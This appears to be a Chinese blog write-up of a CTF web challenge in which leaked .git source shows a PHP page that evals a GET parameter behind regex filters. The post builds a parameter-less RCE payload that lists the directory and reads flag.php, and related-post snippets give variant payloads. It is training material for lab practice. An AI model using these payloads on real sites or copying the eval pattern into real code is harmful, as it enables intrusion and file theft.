BUUCTF [GXYCTF2019] 禁止套娃

最新推荐文章于 2024-08-10 18:49:59 发布
最新推荐文章于 2024-08-10 18:49:59 发布
阅读量915 收藏 3
点赞数 3
分类专栏: BUUCTF WEB Writeup 文章标签: BUUCTF GXYCTF2019 禁止套娃 writeup CTF
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44037296/article/details/111404335
版权

BUUCTF [GXYCTF2019] 禁止套娃

考点:

  1. git源码泄露
  2. (?R)表示引用当前表达式
  3. array_reverse()函数将数组倒序
  4. next()函数指向下一个索引
  5. localeconv()函数返回一包含本地数字及货币格式信息的数组,包含小数点字符,可作为当前路径使用

启动环境:
在这里插入图片描述
打开题目后只有一句话,对题目继续进行信息收集,尝试扫描后台:
在这里插入图片描述
其可能存在Git泄露,使用GitHack下载其源码:

python2 GitHacker.py http://xxx.com/.git/

在这里插入图片描述
下载的文件以URL为命名的文件夹中:
在这里插入图片描述
查看其index.php页面源码:

<?php
include "flag.php";
echo "flag在哪里呢?<br>";
if(isset($_GET['exp'])){
    if (!preg_match('/data:\/\/|filter:\/\/|php:\/\/|phar:\/\//i', $_GET['exp'])) {
        if(';' === preg_replace('/[a-z,_]+\((?R)?\)/', NULL, $_GET['exp'])) {
            if (!preg_match('/et|na|info|dec|bin|hex|oct|pi|log/i', $_GET['exp'])) {
                // echo $_GET['exp'];
                @eval($_GET['exp']);
            }
            else{
                die("还差一点哦!");
            }
        }
        else{
            die("再好好想想!");
        }
    }
    else{
        die("还想读flag,臭弟弟!");
    }
}
// highlight_file(__FILE__);
?>

源码分析:

  • 需要通过GET方式传入参数exp
  • 第一层preg_match()函数限制了php伪协议
  • 第二层preg_replace()正则表达式匹配,(?R)表示引用当前表达式
  • 第三层preg_match()限制了一些关键字
  • @eval($_GET['exp']);可以进行命令执行

首先测试符合正则表达式的结构:

<?php
	$exp = 'a(b());';
	if(';' === preg_replace('/[a-z,_]+\((?R)?\)/', NULL, $exp)) {
		echo "success";
	}
?>

在当形式为a(b());时,满足第二层的要求
在这里插入图片描述
虽然其不能使用php伪协议,但是@eval($_GET['exp']);可以进行命令执行,所以使用scandir()函数列出当前目录中的文件和目录:
在这里插入图片描述
第二层正则表达式无法给directory参数赋值,所以查找能够返回为'.'结果的函数,其中localeconv()函数返回一包含本地数字及货币格式信息的数组,包含小数点字符
但返回的结果为数组类型,使用current()函数返回数组中的当前元素的值,进行测试:

<?php
	echo current(localeconv());
?>

在这里插入图片描述

可以成功回显出.构造payload:

?exp=print_r(scandir(current(localeconv())));

在这里插入图片描述
得到了当前目录中的内容,为了查看flag.php页面的源码,需要使数组的索引为3,在线测试:

<?php
	$tmp = array(".", "..", ".git", "flag.php", "index.php");
	echo next($tmp);
?>

在这里插入图片描述
next()函数不能嵌套使用,查阅资料,可以使用array_reverse()函数将数组倒序,然后使用next()函数指向1号索引,也就是flag.php

<?php
	$tmp = array(".", "..", ".git", "flag.php", "index.php");
	echo next(array_reverse($tmp));
?>

在这里插入图片描述
最后根据源码中提示给出的highlight_file(__FILE__);函数,读取flag.php页面的源码,构造payload:

?exp=highlight_file(next(array_reverse(scandir(current(localeconv())))));

在这里插入图片描述
得到flag

Senimo_
关注
专栏目录
BUUCTF:[GXYCTF2019]禁止套娃&&无参数RCE入门
Zero_Adam的博客
02-10 571
[GXYCTF2019]禁止套娃 想仔细了解?R的话,可以看看这个理解正则表达式中的(?R)递归
BUUCTF-WEB-[GXYCTF2019]禁止套娃
r1727337824的博客
08-29 469
.git源码泄露+代码审计 转载大佬的WP https://blog.csdn.net/weixin_43952190/article/details/107061554 1.打开网址只显示了flag在哪,查看源代码无任何有用信息 2.用御剑也没搜索到后台目录 3.这时候考虑源码泄露 打开网址 http://33c53ef7-d371-44a3-8d84-7ab89291c754.node3.buuoj.cn/.git 出现403错误 403错误是一种在网站访问过程中,常见的错误提示,表示资源不可用。
被监督写博客-Day6
veinard_F的博客
10-09 232
今天做的这道题也不是很难,就是在做题的时候需要联系一些函数的功能,先记录一下这些函数: scandir()可以扫描当前目录下的文件 localeconv() 返回一包含本地数字及货币格式信息的数组 array_reverse()以相反的元素顺序返回数组 array_flip()交换数组的键和值 array_rand()从数组中随机取出一个或多个单元,不断刷新访问就会不断随机返回 current()返回数组当前的值 next()将内部指针指向数组中的下一个元素,并输出 题目 [GXYCTF2019]禁止
buuctf-[GXYCTF2019]禁止套娃1-详解-无参数rce
最新发布
chinese_cabbage0的博客
08-10 240
讲解了buuctf的[GXYCTF2019]禁止套娃题目的解题过程,非常详细,附有两种解题方法
buuctf-[GXYCTF2019]禁止套娃(小宇特详解)
小宇的web博客
02-12 1203
buuctf-[GXYCTF2019]禁止套娃(小宇特详解) 这里先看题 这里没有找到什么有用的信息,先使用dirsearch来爆破但是没有找到有用的,这时我就怀疑是有git泄露了这里使用githack探测发现了index.php 这里直接看源码吧 <?php 2 include "flag.php"; 3 echo "flag在哪里呢?<br>"; 4 if(isset($_GET['exp'])){//需要以GET形式传入一个名为exp的参数。如果满足条件会执行这个exp参数的
buuctf-[GXYCTF2019]禁止套娃
qq_42728977的博客
12-24 3699
[GXYCTF2019]禁止套娃考点复现法一:单纯构造GET参数法二:构造session组合拳参考 考点 正则表达、无参数rce、git泄露 复现 法一:单纯构造GET参数 打开就一句 然后查看源码,空空如也。想到扫描后台文件,使用御剑很慢,使用dirsearch,一直429,查找资料,加了-s参数,也就是扫描不能太快。 python3 .\dirsearch.py -u http://5c0edec0-316a-4de9-999a-669f813c771b.node4.buuoj.cn:81/ -e
【学习笔记3】buu [GXYCTF2019]禁止套娃
weixin_43553654的博客
05-08 364
知识点:1. /.git泄露2.无参数RCE3.各种php函数的使用解题 首先登录进去后发现什么都没有,查看源码,抓包也什么都没信息,去瞄了一眼大佬的wp知道了这是.git文件泄露从而导致的源码的泄露,不过别人是用扫描器跑出来的,可是我试了一试,因为我请求的次数太多,什么都没有跑出来。不过知道后就可以用Githack脚本跑了,这个脚本是python2环境,可以放在kali下跑,命令就是p...
无参数函数RCE+[GXYCTF2019]禁止套娃 1
bazzza的博客
12-27 922
目录无参数RCE常用函数数组操作array_fliparray_randarray_reversecurrent文件file_get_contents()readfile()highlight_file()[别名:show_source()]scandir()direname()getcwd()chdir($directory)读取环境变量get_defined_vars()getenvlocaleconv()phpversion()会话session_idsession_start其它[GXYCTF201
[GXYCTF2019]禁止套娃(.git泄露,无参RCE)
xlcvv的博客
04-17 3425
这里fuzz了一下,已经确认是源码泄露了,因为都没什么线索了,但是这问题就来了,用dirsearch扫的话,就会因为访问次数过快,导致扫描不出来,啊,那就瞄一下师傅们的wp叭! .git源码泄露,用GitHack拿到index.php: 看到了eval($_GET['exp']),就是一句话木马的GET方式,题目又加了好多过滤限制了REC,这就考验做题者的积累了(我小白积累太少了)。 看代码,第...
web buuctf [GXYCTF2019]禁止套娃1
weixin_44214568的博客
03-24 1792
考点:1.git泄露 2.无参RCE 1.用御剑扫后台没扫到啥东西 看robots.txt文本,也没有 2.都这样了,考虑一下有没有可能存在.git泄露, (我装了两个版本的python,githack需要在python2下运行) index.php源码如下 <?php include "flag.php"; echo "flag在哪里呢?<br>"; if(isset($_GET['exp'])){ if (!preg_match('/data:.
BUUCTF WEB [GXYCTF2019]禁止套娃
Y1da的博客
04-22 1522
BUUCTF WEB [GXYCTF2019]禁止套娃 没有任何提示,使用dirsearch扫描 # Dirsearch started Fri Apr 22 02:23:09 2022 as: ./dirsearch.py -u http://ffd94bba-98ea-4150-9103-09306827d709.node4.buuoj.cn:81/ --delay=0.5 -t 3 301 185B http://ffd94bba-98ea-4150-9103-09306827d709
BUUCTF刷题笔记[GXYCTF2019]禁止套娃
devilare的博客
07-02 334
[GXYCTF2019]禁止套娃 打开题目,啥也没有 F12,抓包啥也没有,扫描一下,dirscher-master扫描不出来,用一下git hack,得到源码: <?php include "flag.php"; echo "flag在哪里呢?<br>"; if(isset($_GET['exp'])){ if (!preg_match('/data:\/\/|filter:\/\/|php:\/\/|phar:\/\//i', $_GET['exp'])) {
#WEB-buuctf-禁止套娃 1
weixin_52804141的博客
12-25 180
是一个黑名单绕过像et,na,info,dec,bin,hex,oct,pi,log,i不能使用。因为上述过滤的并未过滤 session_id() 所以我想到的使用 session_id来获取 flag。)时,可执行exp传递的命令。然后过滤了data协议,filter协议,php伪协议,phar。一,进入环境,在目录扫描未果,猜测可能是.git泄露,尝试一下。二,利用工具scrabble,果真是.git泄露。1,.git泄露,scrabble的使用。得到如下源码,开始代码审计。2,无参数RCE,通过。
BUUCTF】[GXYCTF2019]禁止套娃
aoao331198的博客
04-13 836
dirsearch扫描目录发现存在git泄露 于是用GitHack 生成index.php <?php include "flag.php"; echo "flag在哪里呢?<br>"; if(isset($_GET['exp'])){ if (!preg_match('/data:\/\/|filter:\/\/|php:\/\/|phar:\/\//i', $_GET['exp'])) { if(';' === preg_replace('/[a-z,_]+\
[BUUCTF刷题]禁止套娃
weixin_43952190的博客
07-01 2183
禁止套娃 exp=show_source(next(array_reverse(scandir(pos(localeconv()))))); exp=show_source(array_rand(array_flip(scandir(pos(localeconv()))))); exp=show_source(session_id(session_start())); 进入后显示flag在哪儿,找不到线索,进行目录扫描。但也没有扫到。查看别人的wp发现是.git泄露。但是自己的网址下/.git
wp-buuctf-禁止套娃(无参绕过)【多方法】
bin789456的博客
11-08 2156
wp 一开始没看到什么东西,那就开始找吧,常用备份,robots协议,目录爆破,git泄露慢慢试。 试了下git泄露,有东西了: 打开得到的index.php,源码如下: <?php include "flag.php"; echo "flag在哪里呢?<br>"; if(isset($_GET['exp'])){ if (!preg_match('/data:\/\/|filter:\/\/|php:\/\/|phar:\/\//i', $_GET['exp'])) {
BUUCTF WEB 禁止套娃1
qq_41696858的博客
12-08 739
打开场景,空荡荡的,啥也没有 正常思路,扫目录,dirsearch有防扫,dirmap 扫出来.git,源码泄露没跑了 GitHacker跑出来是空文件,我也不知道为啥 GitHack看看能不能找出什么有用的东西,跑出来index.php的源码 源码如下 <?php include "flag.php"; echo "flag在哪里呢?<br>"; if(isset($_GET['exp'])){ if (!preg_match('/data:\/\/|filter:\/\/|ph
BUUCTF-[GXYCTF2019]禁止套娃
yuqie的博客
04-06 290
对于第二个if,(?R)是引用当前表达式,(?\),可以迭代下去,那么它所匹配的就是print(echo(1))、a(b(c()));所以可以先利用函数array_reverse将数组反转,flag就在第二位了,再利用next指向第二位数组,在用文件显示包涵即可输出flag.php文件,构造payload。开始审计源码,我们最终的目标是执行@eval($_GET['exp']),从这开始瞄一下大佬的wp,因为我的脚本基础差的没眼看。pos(),传入数组,回显第一个数组的值,pos可以用current代替。
俄罗斯套娃c语言程序
02-15
俄罗斯套娃是一种传统的俄罗斯玩具,它由一组套在一起的木质人偶组成,每个人偶都可以打开,里面还有一个更小的人偶。如果你想在C语言中实现俄罗斯套娃程序,你可以使用结构体和指针来表示套娃的层次结构。 首先,...
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值